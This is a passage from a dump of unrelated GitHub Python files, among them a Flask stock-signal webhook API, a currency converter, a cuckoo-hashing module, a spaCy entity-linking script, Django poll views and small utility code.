send_file(abs_path)\n\n# # Show directory contents\n# files = os.listdir(abs_path)\n# return render_template('index.html', files=files)\n\n@app.route('/.well-known/pki-validation/B87B968F8367A7B79753D5221B1BFDD0.txt')\ndef identify():\n with open('C:\\SSL_TOOL\\key\\B87B968F8367A7B79753D5221B1BFDD0.txt') as f:\n lines = f.read()\n print(lines)\n return lines\n\n@app.route('/stock-sample')\ndef stockapp():\n with open('C:/Users/purem/Desktop/stock_tracking_system/project/index.html') as f:\n lines = f.read()\n print(lines)\n return lines # return the page contents; a bare return replied with None\n\n@app.route('/signal_us500')\ndef getSignalUs500():\n db = DbHelper('tradingview.db','ALERTMESSAGE')\n signal = db.ReadUs500()\n print(signal)\n return signal\n\n@app.route('/login', methods=[\"POST\"])\ndef login():\n return \"OK!\"\n\n@app.route('/stockInfo', methods=['POST'])\ndef stockInfo():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n req = json.loads(request.data)\n \n print(req,req['stockCode'],req['time'])\n \n feedback = MyRequest(req['time'],req['stockCode'])\n \n response = feedback.GetStockInfo()\n \n print(response)\n return json.dumps(response) \n # return \"OK!\"\n\n@app.route('/stockInfoV2', methods=['POST'])\ndef stockInfoV2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n req = json.loads(request.data)\n \n print(req,req['stockCode'],req['time'])\n \n feedback = MyRequest(req['time'],req['stockCode'])\n \n response = feedback.GetStockInfoV2()\n \n print(response)\n return json.dumps(response) \n\n@app.route('/threeBig', methods=['POST'])\ndef threeBig():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n req = json.loads(request.data)\n \n print(req,req['stockCode'],req['time'])\n \n feedback = MyRequest(req['time'],req['stockCode'])\n \n response = feedback.GetThreeBig()\n \n print(response) \n return response\n\n@app.route('/threeBigMonth', methods=['POST'])\ndef threeBigMonth():\n print(\"--request start--\")\n print(request)\n print(request.json)\n print(\"--request end--\")\n\n req = request.json\n \n # Check whether the current month's data is complete for the given date\n checkResult = CheckCurrentMonthData(req['time'])\n # print(checkResult)\n # If any dates are returned, data is missing for those dates\n \n # print('checking data')\n \n if len(checkResult) != 0:\n feedback = MyRequest(req['time'],req['stockCode'])\n # response = 
feedback.GetThreeBig()\n # print(response)\n \n for i in checkResult:\n # print(\"---\",i,\"---\")\n feedback.date = i\n response = feedback.GetThreeBig()\n # print(response) \n # print(\"----write data----\")\n \n datas = response['data']\n \n for row in datas:\n # print(row[0],row[1],row[2],row[3],response['date'])\n WriteThreeBig(row[0],row[1],row[2],row[3],response['date'])\n \n \n # print(\"----write data complete----\") \n # print(\"---\",i,\"complete\",\"---\")\n \n\n # print('checking data complete')\n return json.dumps(ReadThreeBigByMonth(req['time']))\n \n\n@app.route('/webhook_bitcoin', methods=['POST'])\ndef webhook_bitcoin():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'bitcoin')\n \n return \"OK!\"\n \n@app.route('/webhook_us500_d1', methods=['POST'])\ndef webhook_us500_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_us500_h4', methods=['POST'])\ndef webhook_us500_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_h4')\n \n return \"OK!\"\n \n@app.route('/webhook_us500_h2', methods=['POST'])\ndef webhook_us500_h2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_h2')\n \n return \"OK!\"\n\n@app.route('/webhook_us500_h1', methods=['POST'])\ndef webhook_us500_h1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_h1')\n \n return \"OK!\"\n \n@app.route('/webhook_us500_m5', methods=['POST'])\ndef webhook_us500_m5():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_m5')\n \n return \"OK!\"\n\n@app.route('/webhook_us500_m5_2', methods=['POST'])\ndef webhook_us500_m5_2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_m5_2')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_d1', methods=['POST'])\ndef webhook_nas100_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_h4', methods=['POST'])\ndef webhook_nas100_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_h4')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_h2', methods=['POST'])\ndef webhook_nas100_h2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_h2')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_h1', methods=['POST'])\ndef webhook_nas100_h1():\n print(\"--request start--\")\n print(request)\n 
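# Editor's sketch: the near-identical POST handlers in this file could be generated\n    # from one factory and registered with Flask's add_url_rule; the symbol names in the\n    # loop below are placeholders, not routes taken from this app. Kept commented here\n    # so it does not run inside a request handler.\n    # def make_webhook(symbol):\n    #     def handler():\n    #         data = request.data.decode('utf-8')\n    #         WriteData(data, symbol)\n    #         return \"OK!\"\n    #     handler.__name__ = \"webhook_\" + symbol   # unique endpoint name per route\n    #     return handler\n    # for sym in [\"example_h1\", \"example_d1\"]:\n    #     app.add_url_rule(\"/webhook_\" + sym, view_func=make_webhook(sym), methods=[\"POST\"])\n    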
print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_h1')\n \n return \"OK!\"\n\n@app.route('/webhook_qqq_d2', methods=['POST'])\ndef webhook_qqq_d2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'qqq_d2')\n \n return \"OK!\"\n\n@app.route('/webhook_qqq_d1', methods=['POST'])\ndef webhook_qqq_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'qqq_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_qqq_h4', methods=['POST'])\ndef webhook_qqq_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'qqq_h4')\n \n return \"OK!\"\n\n@app.route('/webhook_spy_d2', methods=['POST'])\ndef webhook_spy_d2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'spy_d2')\n \n return \"OK!\"\n\n@app.route('/webhook_spy_d1', methods=['POST'])\ndef webhook_spy_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'spy_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_spy_h4', methods=['POST'])\ndef webhook_spy_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'spy_h4')\n \n return \"OK!\"\n\n\ndef allowed_gai_family():\n # \"\"\"\n # https://github.com/shazow/urllib3/blob/master/urllib3/util/connection.py\n # \"\"\"\n family = socket.AF_INET\n return family\n\nurllib3_cn.allowed_gai_family = allowed_gai_family\n\n\n\n\n# app.add_url_rule('/favicon.ico',redirect_to=url_for('static', filename='favicon.ico'))\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=443, ssl_context=('C:\\\\SSL_TOOL\\\\secret\\\\certificate.crt', 'C:\\\\SSL_TOOL\\\\secret\\\\private.key'))\n\n# print(CheckCurrentMonthData('20220326'))\n\n\n","repo_name":"puremars2015/StockTracker","sub_path":"python_files/myapi.py","file_name":"myapi.py","file_ext":"py","file_size_in_byte":11874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15571033312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 16 15:26:40 2018\n\n@author: s1881079\n\"\"\"\n\nfrom datetime import datetime\nimport time\nimport re\nimport sys\n\n__all__ = ['readJCMB','goodBye']\n\n\ndef modTomorrow(str_lstday):\n '''Generate datetime object from string when string has '24:00'\n \n datetime.strptime() cannot identify '24:00', therefore this fuction \n generate timestamp of string containing '24:00' and then convert it to\n datetime type.\n \n ..code referencing:\n https://stackoverflow.com/questions/3493924/how-can-i-convert-the-time-in-a-datetime-string-from-2400-to-0000-in-python\n \n Parameters\n ----------\n str_lstday : str\n string of date to convert, format '%Y/%m/%d %H:%M'\n \n Returns\n -------\n datetime\n data in datetime type of the input date\n \n \n '''\n try:\n tup_lstday = tuple((int(i) for i in (re.split(r'/| |:', str_lstday))))\n tup_tail = 
 (0,0,1,-1)\n tup_lstday += tup_tail\n time_stamp = time.mktime(tup_lstday)\n except:\n print('fail to modify time with 24:00 to 0:00')\n return None\n \n try:\n mod_tomorrow = datetime.fromtimestamp(time_stamp)\n except:\n print('fail to generate datetime from timestamp')\n \n return mod_tomorrow\n \n\ndef modifyTime(ori_strtime):\n '''Convert date information from string to datetime\n \n format of string should be like '%Y/%m/%d %H:%M'\n ''' \n try:\n md_date = datetime.strptime(ori_strtime,'%Y/%m/%d %H:%M')\n except:\n if ori_strtime[11:13] == '24':\n try:\n md_date = modTomorrow(ori_strtime)\n except:\n print('Unexpected date format')\n return None\n else:\n print('Unexpected date format')\n return None\n \n return md_date\n\n\ndef modifyLine(ori_line):\n '''Modify input line \n \n Each input string will be split by ',', with the first element \n transformed into a datetime object and the rest transformed to float.\n datetime format should be like '%Y/%m/%d %H:%M'\n \n Parameters\n ----------\n ori_line : str\n original string \n \n Returns\n -------\n list\n list containing the modified data values from the input string\n \n '''\n try:\n slst_line = ori_line[:-1].split(',')\n except:\n print('fail to split data line with comma')\n return None\n \n md_date = modifyTime(slst_line[0])\n \n if md_date == None:\n print('fail to read date')\n return None\n \n try:\n flst_else= [float(item) for item in slst_line[1:]]\n except:\n print('fail to convert data to float')\n return None\n \n md_line = [md_date] + flst_else\n return md_line\n\n\ndef readHeader(in_file):\n '''Read file header\n \n Read first line of input file, split with ',' and return list of headers\n \n Parameters\n ----------\n in_file\n \n Returns\n -------\n list\n list containing the data header\n int\n number of columns shown in the data header\n \n '''\n print('reading header...')\n data_head = in_file.readline()[:-1].split(',')\n return data_head,len(data_head)\n\n
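# Editor's sketch of the '24:00' rollover that modTomorrow() above implements via a\n# timestamp round-trip; this hypothetical variant uses plain string substitution\n# instead, assuming '24' can only ever appear in the hour field.\ndef parse_with_midnight_rollover(s):\n from datetime import datetime, timedelta\n if s[11:13] == '24':\n return datetime.strptime(s.replace(' 24:', ' 00:'), '%Y/%m/%d %H:%M') + timedelta(days=1)\n return datetime.strptime(s, '%Y/%m/%d %H:%M')\n# parse_with_midnight_rollover('2011/01/01 24:00') -> datetime(2011, 1, 2, 0, 0)\n\n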
def readValue(in_file,ncols):\n '''read values and modify them line by line\n \n Read values and modify them by line through the function modifyLine().\n If a line cannot be stored due to a missing or extra column, wrong format etc., \n the line will be skipped.\n \n Parameters\n ----------\n in_file\n file input\n ncols\n number of columns, this should be the same as the number given by readHeader(),\n which is the number of columns of the header line in the file \n \n Returns\n -------\n list\n a result list that contains one list storing each column of data\n \n '''\n print('reading value in following lines...')\n data_value = [[] for i in range(ncols)]\n \n line_num= 1\n valid_linecount = 0\n skip_linecount = 0\n \n for line in in_file.readlines():\n line_num += 1\n md_line = modifyLine(line)\n \n if md_line == None:\n print('skip line ' + str(line_num))\n skip_linecount += 1\n continue\n \n try:\n for (v_lst,v) in zip(data_value,md_line):\n v_lst.append(v)\n except:\n print('fail to include data in line ' + str(line_num) + ''' to database. \n please check whether the number of data fields fits the number of headers''')\n print('skip line ' + str(line_num))\n skip_linecount += 1\n continue\n \n valid_linecount += 1\n \n print('total lines read (except header):' + str(line_num - 1))\n print('valid lines:' + str(valid_linecount) + ' lines')\n print('skipped lines:' + str(skip_linecount) + ' lines')\n \n return data_value\n \n\ndef readJCMB(file_name):\n '''reading file JCMB_2011.csv\n \n This function was originally written to read the data in JCMB_2011.csv, but files with\n a similar data storage format can also be read using this function.\n \n The required format is as follows:\n elements in each line are separated by ',', lines are separated by '\\n'\n the first line is a header line\n data in the first column indicates date data, format as '%Y/%m/%d %H:%M'\n \n Parameters\n ----------\n filename : str\n \n Returns\n -------\n dict\n dictionary containing each header as key and list of data as value\n list\n list of headers read. Since the order of storing information in a dictionary\n would be regenerated, and considering some headers are quite long and may\n need to be used further, the list of headers is also returned \n to keep the original order, which can be more easily checked in the file.\n \n '''\n \n try:\n in_file = open(file_name,'r')\n except:\n print('fail to open file')\n goodBye(0)\n else:\n print('file ' + file_name + ' opened successfully')\n \n try:\n data_head,len_head = readHeader(in_file)\n except:\n print('fail to read header line, closing file...')\n in_file.close()\n return None,None\n \n \n data_value = readValue(in_file,len_head)\n \n try:\n dict_data = dict(zip(data_head, data_value))\n except:\n print('data values and header were read correctly, but failed to generate dictionary')\n return None,None\n \n try:\n in_file.close()\n except:\n print('warning: file was opened but is not closed yet')\n else:\n print('file ' + file_name + ' closed successfully')\n \n \n return dict_data,data_head\n\n\ndef goodBye(did_suc):\n '''a little function to say goodbye to my dear users :)'''\n if did_suc:\n print('Plotting process succeeded.')\n print('Congratulations! GoodBye~ :)')\n sys.exit(0)\n else:\n print('Sorry for that:( Maybe try again with another data file. \\nGood luck next time! GoodBye~')\n sys.exit(1)","repo_name":"s1881079/weather-info-plotting","sub_path":"TK2/task2IOM.py","file_name":"task2IOM.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"23401854732","text":"import Experiment\n\n# Above 8 appears to make no difference in the load factor achieved\nmaxLoop = 8\n\n\ndef cuckoo_insert(value):\n # Iterate through both hash functions until able to insert, or return False if not able\n j = 0\n while j < maxLoop:\n for i in range(len(Experiment.twoHashFunctions)):\n if Experiment.useHalfTable:\n indexOffset = Experiment.twoHashFunctions[i](value)\n index = indexOffset + i * Experiment.halfTable\n else:\n index = Experiment.twoHashFunctions[i](value)\n if Experiment.hashTable[index] is None:\n Experiment.hashTable[index] = value\n return True\n # This else branch actually fails to insert at a lower load factor\n else:\n # There is an element in this index, so swap them. This is the cuckoo step: the evicted value will try to be re-hashed on the next iteration\n Experiment.hashTable[index], value = value, Experiment.hashTable[index]\n j += 1\n # print(\"Unable to insert\")\n return False\n
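\n# Editor's illustration of the displacement step in isolation: a self-contained toy\n# with two inline hash functions on a small table (names here are hypothetical,\n# mirroring the structure of cuckoo_insert above).\ndef toy_cuckoo_insert(table, value, max_loop=8):\n hashes = [lambda v: v % len(table), lambda v: (v // len(table)) % len(table)]\n for _ in range(max_loop):\n for hf in hashes:\n idx = hf(value)\n if table[idx] is None:\n table[idx] = value\n return True\n # occupied: evict the resident and try to re-home it next\n table[idx], value = value, table[idx]\n return False # give up; a real implementation would rehash or resize\n# e.g. table = [None]*8; toy_cuckoo_insert(table, 42) -> True\n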
This is the Cuckoo step and the displaced value will try to be re-hashed\n Experiment.hashTable[index], value = value, Experiment.hashTable[index]\n j += 1\n # print(\"Unable to insert\")\n return False\n\n\n# Return the index of a value if it is in the table\ndef lookup(value):\n # Iterate through all four hash functions searching for the value\n for i in range(len(Experiment.twoHashFunctions)):\n if Experiment.useHalfTable:\n indexOffset = Experiment.twoHashFunctions[i](value)\n index = indexOffset + i * Experiment.halfTable\n else:\n index = Experiment.twoHashFunctions[i](value)\n if Experiment.hashTable[index] is value:\n return index\n print(\"Value not in table\")\n return None\n\n\ndef delete(value):\n # Call lookup to find index, if it exists\n index = lookup(value)\n if index is not None:\n Experiment.hashTable[index] = None\n","repo_name":"Ikuni17/432-Project","sub_path":"Cuckoo_Hashing.py","file_name":"Cuckoo_Hashing.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72526938647","text":"import json\nimport spacy # version 3.5\nimport glob\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef lire_fichier(chemin):\n with open(chemin, \"r\", encoding=\"utf-8\") as fichier:\n texte = fichier.read()\n return texte\n\ndef stocker(chemin, contenu):\n with open(chemin, \"w\") as w:\n json.dump(contenu, w, indent=2)\n\nmodele = [\"md\"]\npath_corpora = \"../DATA/ELTeC-Fra_2023/ADAM/ADAM_krakenbase/*/*.txt\"\ncommon_urls_per_file = []\ncommon_urls = []\nnon_common_urls = []\n\nfor mod in modele:\n print(\"For model:\", mod, \"\\n\")\n nlp = spacy.load(\"fr_core_news_\" + mod)\n nlp.add_pipe(\"entityLinker\", last=True)\n for path in glob.glob(path_corpora):\n print(\"Input:\", path)\n texte = lire_fichier(path)\n doc = nlp(texte)\n list_resultats = []\n list_entites = []\n compteur = 0\n intersect = 0\n nb_entite = 0\n\n i = 1\n dico={}\n for ent in doc.ents:\n \n contexte = str(texte[ent.start_char-50:ent.start_char])+str(ent.text)+ str(texte[ent.end_char:ent.end_char+50])\n entite = ent.text\n \n print(entite)\n liste_url_entourage = []\n liste_url_entite = []\n doc3 = nlp(entite)\n doc2 = nlp(contexte)\n for ent in doc2._.linkedEntities:\n url_entourage = ent.get_url()\n liste_url_entourage.append(url_entourage)\n for ent in doc3._.linkedEntities:\n url_entite = ent.get_url()\n liste_url_entite.append(url_entite)\n #print (liste_url_entite)\n for d in liste_url_entite :\n if d in liste_url_entourage :\n #print (d)\n intersect = intersect + 1\n compteur +=1\n nb_entite+= 1\n \n non = compteur-intersect\n print(\"Spacy's NER identified\", nb_entite, \"entities\")\n print(\"The entity linker found\", compteur, \"entities\")\n print(\"There are\", intersect, \"common elements\")\n print(\"There are\", non, \"elements that are not in common\")\n \n \n \n# common_urls.extend(liste_url_entite)\n# common_urls_per_file.append((path, set(liste_url_entite) & set(liste_url_entourage)))\n\n# non_common_urls.extend(liste_url_entite)\n\n# # Calculate proportions\n# total_common_urls = len(common_urls)\n# total_non_common_urls = len(non_common_urls)\n# total_urls = total_common_urls + total_non_common_urls\n# common_urls_proportion = total_common_urls / total_urls\n# non_common_urls_proportion = total_non_common_urls / total_urls\n\n# # Create a bar plot\n# labels = ['Common URLs', 'Non-Common URLs']\n# proportions = [common_urls_proportion, non_common_urls_proportion]\n\n# 
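
The cuckoo-hashing record above depends on a shared `Experiment` module for its table and hash functions. A self-contained sketch of the same displacement loop, with two toy hash functions standing in for `Experiment.twoHashFunctions` (all names and sizes here are illustrative):

```python
TABLE_SIZE = 11
MAX_LOOP = 8
table = [None] * TABLE_SIZE
hash_fns = [lambda v: v % TABLE_SIZE,
            lambda v: (v // TABLE_SIZE) % TABLE_SIZE]

def cuckoo_insert(value):
    for _ in range(MAX_LOOP):
        for h in hash_fns:
            i = h(value)
            if table[i] is None:
                table[i] = value
                return True
            # slot occupied: evict the resident and try to re-place it
            table[i], value = value, table[i]
    return False  # gave up after MAX_LOOP displacements; a real table would rehash

for v in (3, 14, 25, 7):
    print(v, cuckoo_insert(v))
print(table)
```
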
plt.bar(labels, proportions, color=['blue', 'red'])\n# plt.xlabel('URL Types')\n# plt.ylabel('Proportion')\n# plt.title('Proportion of Common URLs and Non-Common URLs')\n# plt.show()\n","repo_name":"CarolineDorleans/Stage-SCAI2023","sub_path":"entityLinker/EXPE03-CAROLINE-STAGE _filtrage/programme/testELSpacy_comparaison-avec-sans-contexte.py","file_name":"testELSpacy_comparaison-avec-sans-contexte.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9053975863","text":"from flask import Flask, render_template, request\nimport calendar\nimport requests\nfrom bs4 import BeautifulSoup\nimport lxml\nimport datetime\nfrom pickle import TRUE, NONE\n\napp = Flask(__name__, static_url_path='/static')\n\n\nclass Currency:\n\n def __init__(self, month, year, iso3, value):\n self.month = int(month)\n self.year = int(year)\n self.iso3 = str(iso3)\n self.value = float(value)\n\n \nhistoryCurrencys = []; \n\ncurrencyConversion = {\n \"EUR-USD\":1.1916,\n \"USD-EUR\":0.8392,\n \"date\":\"-undefined-\"\n }\n\ncurrencys = {\n \"EUR\": {\n \"text\":\"Euro\",\n \"sign\":\"\\u20ac\",\n \"iso2code\":\"EU\",\n \"iso3code\": \"EUR\"\n },\n \"USD\": {\n \"text\":\"Dollar\",\n \"sign\":\"$\",\n \"iso2code\":\"US\",\n \"iso3code\":\"USD\"\n } \n }\n\ncurrentYear = 0\ncurrentMonth = 0\n\n\n@app.route('/')\ndef start():\n global currentYear\n global currentMonth\n \n currentYear = datetime.date.today().year \n currentMonth = datetime.date.today().month\n currentDateStr = getFormatedDate(currentMonth, currentYear)\n iso3 = currencys[\"USD\"][\"iso3code\"]\n if historyListContainsElement(currentMonth, currentYear, iso3):\n usDollar = findHistoryElement(currentMonth, currentYear, iso3)\n else:\n usDollar = loadDataFromCustoms(currencys[\"USD\"][\"iso2code\"], currentMonth, currentYear)\n appendHistoryData(currentMonth, currentYear, iso3, usDollar)\n\n euro = round(1 / usDollar, 4)\n \n currencyConversion[\"EUR-USD\"] = usDollar\n currencyConversion[\"USD-EUR\"] = euro\n currencyConversion[\"date\"] = currentDateStr\n \n srcValue = '1'\n srcCurrency = currencys['EUR']\n destCurrency = currencys['USD']\n \n return render_template(\"template.html\", umrechnunskurse=currencyConversion , srcValue=srcValue, srcCurrencyBlock=srcCurrency, destCurrencyBlock=destCurrency, historyCurrencys=historyCurrencys)\n\n\ndef getFormatedDate(month, year):\n date = \"01.\"\n if(month < 10):\n date = date + \"0\"\n date = date + str(month) + \".\" + str(year)\n return date\n\n\n@app.route('/calc')\ndef calcCurrency():\n srcValue = request.args.get(\"srcValue\")\n srcCurrency = request.args.get(\"srcCurrency\")\n destCurrency = request.args.get(\"destCurrency\")\n key = srcCurrency + \"-\" + destCurrency\n rate = currencyConversion[key]\n \n value = float(srcValue.replace(\",\", \".\"))\n output = round(value * rate, 2)\n \n return render_template(\"output.html\", umrechnunskurse=currencyConversion , srcValue=srcValue, destOutput=str(output), srcCurrencyBlock=currencys[srcCurrency], destCurrencyBlock=currencys[destCurrency], historyCurrencys=historyCurrencys)\n\n\ndef loadDataFromCustoms(currency, monat, jahr): \n max_day_in_month = calendar.monthrange(jahr, monat)[1]\n\n url = \"http://www.zoll.de/SiteGlobals/Functions/Kurse/KursExport.xml?\"\\\n +\"view=xmlexportkursesearchresultZOLLWeb&kursart=1&iso2code2=\" + currency\\\n +\"&startdatum_tag2=01&startdatum_monat2=\" + str(monat) + \"&startdatum_jahr2=\" + str(jahr)\\\n 
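
The entity-linker experiment above boils down to counting how many Wikidata URLs the linker produces identically with and without the 50-character context window; the bookkeeping is a set intersection. A tiny sketch with made-up URL lists:

```python
urls_entity_only = ["https://www.wikidata.org/wiki/Q90",
                    "https://www.wikidata.org/wiki/Q142"]
urls_with_context = ["https://www.wikidata.org/wiki/Q90",
                     "https://www.wikidata.org/wiki/Q3181341"]

common = set(urls_entity_only) & set(urls_with_context)
print("entity linker found:", len(urls_entity_only), "entities")
print("common elements:", len(common))
print("not in common:", len(urls_entity_only) - len(common))
```
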
+\"&enddatum_tag2=\" + str(max_day_in_month) + \"&enddatum_monat2=\" + str(monat) + \"&enddatum_jahr2=\"\\\n +str(jahr) + \"&sort=asc&spalte=gueltigkeit\"\n\n print(url)\n\n r = requests.get(url)\n document = BeautifulSoup(r.content, \"lxml\")\n return float(document.find('kurswert').text.replace(\",\", \".\"))\n\ndef historyListContainsElement(month, year, iso3):\n return findHistoryElement(month, year, iso3) != None\n\ndef findHistoryElement(month, year, iso3):\n for c in historyCurrencys:\n if c.month == month and c.year == year and c.iso3 == iso3:\n return c\n return None\n\ndef appendHistoryData(month, year, iso3, value):\n isNew = True\n for c in historyCurrencys:\n if c.month == month and c.year == year:\n isNew = False\n print(c)\n break;\n \n if isNew:\n historyCurrencys.append(Currency(month, year, iso3, value))\n with open(\"static/data.csv\", \"a\") as file:\n file.write(str(month) +';' + str(year) + ';' + str(iso3) + ';' + str(value))\n\ndef loadData():\n global historyCurrencys\n with open(\"static/data.csv\", \"r\") as file:\n for line in file:\n values = line.strip().split(\";\")\n print(values)\n if(len(values) == 4):\n historyCurrencys.append(Currency(values[0], values[1], values[2], values[3]))\n \n year = datetime.date.today().year \n month = datetime.date.today().month\n iso3 = currencys[\"USD\"][\"iso3code\"]\n if historyListContainsElement(month, year, iso3):\n iso2 = currencys[\"USD\"][\"iso2code\"]\n value = loadDataFromCustoms(iso2, month, year)\n appendHistoryData(month, year, iso3, value)\n \napp.before_first_request(loadData); \n\nif __name__ == '__main__':\n app.run()\n \n","repo_name":"StefanDraeger/PyCurrencyCalulator","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31245572022","text":"from django.shortcuts import render, get_object_or_404, get_list_or_404, redirect\nfrom django.http import HttpResponse\n\nfrom django.views.generic import(\n ListView,\n DetailView,\n)\n#ADDED FXNS\nfrom .extra import get_client_ip, add_ip, has_voted\n\nfrom .models import Question, Choice, Voters\n\n\nclass Polls_list_view(ListView):\n template_name = 'polls/polls_list.html'\n model = Question\n \n \n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Polls'\n return context\n\n\nclass Polls_detail_view(DetailView):\n template_name = 'polls/polls_detail.html'\n queryset = Question.objects.all()\n\n def get_object(self):\n id_ = self.kwargs.get('id')\n return get_object_or_404(Question, id=id_)\n \n\ndef Vote(request, id, *args, **kwargs):\n question_ = get_object_or_404(Question, id=id)\n queryset = get_list_or_404(Choice, question = question_)\n context = {\n 'question' : question_,\n 'object_list' : queryset,\n }\n status_ = has_voted(question_, request)\n #print(status_)\n if status_[0]==True:\n return HttpResponse(f'
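
In the currency-converter record above, the `/calc` route resolves its rate by concatenating the two ISO codes into a dictionary key and accepts comma decimals. The core computation, separated from Flask (the rates here are placeholder values):

```python
rates = {"EUR-USD": 1.1916, "USD-EUR": 0.8392}

def convert(src_value, src_currency, dest_currency):
    rate = rates[src_currency + "-" + dest_currency]
    value = float(src_value.replace(",", "."))  # accept '2,50' as well as '2.50'
    return round(value * rate, 2)

print(convert("2,50", "EUR", "USD"))  # 2.98
```
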

    You have already voted. Your choice was: {status_[1]}')\n\n\n vote = request.POST.get('vote_given')\n if request.method == 'POST' and vote is not None :\n choice_voted = get_object_or_404(Choice, id=vote, question = question_)\n\n #vote saving\n question_.votes+=1\n choice_voted.votes+=1\n\n question_.save()\n choice_voted.save()\n #adding IP\n add_ip(question_, choice_voted, request)\n\n\n return redirect('../')\n \n return render(request, 'polls/polls_vote.html', context)\n\n\n","repo_name":"aka-vm/Polls-Site","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11439736686","text":"import globalVars as gv\n\nclass Scope():\n def __init__(self, parentScope, filename):\n self.filename = filename\n self.parentScope = parentScope\n self.members = {}\n\n def add(self, nameToken, node):\n name = nameToken.value\n if name not in self.members:\n self.members[name] = node\n return\n\n print(f'{self.filename}:{nameToken.lineNr}: duplicate variable: {name}')\n gv.errors = True\n\n def resolveName(self, nameToken):\n name = nameToken.value\n if name in self.members:\n return self.members[name]\n\n if self.parentScope:\n return self.parentScope.resolveName(nameToken)\n\n print(f'Error:{self.filename}:{nameToken.lineNr}: undeclared variable: {name}')\n gv.errors = True\n return None","repo_name":"simaz33/NewLanguage","sub_path":"scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24802814886","text":"class Solution(object):\n def removeDuplicateLetters(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n countList = [0] *26\n boolList = [False] * 26\n for c in s:\n countList[ord(c)-ord('a')] +=1\n stack = []\n for c in s:\n countList[ord(c) - ord('a')] -= 1\n if boolList[ord(c) - ord('a')]:\n continue\n while len(stack) and c < stack[-1] and countList[ord(stack[-1]) - ord('a')] > 0:\n boolList[ord(stack[-1]) - ord('a')] = False\n stack.pop()\n stack.append(c)\n boolList[ord(c)-ord('a')] = True\n return ''.join(stack)","repo_name":"BohaoLiGithub/Leetcode","sub_path":"316. Remove Duplicate Letters/316. Remove Duplicate Letters(AC).py","file_name":"316. Remove Duplicate Letters(AC).py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8634725741","text":"from itertools import chain\r\n\r\nfrom gendiff.compare_data.comparison_tree import ADD, DEL, KEPT\r\nfrom 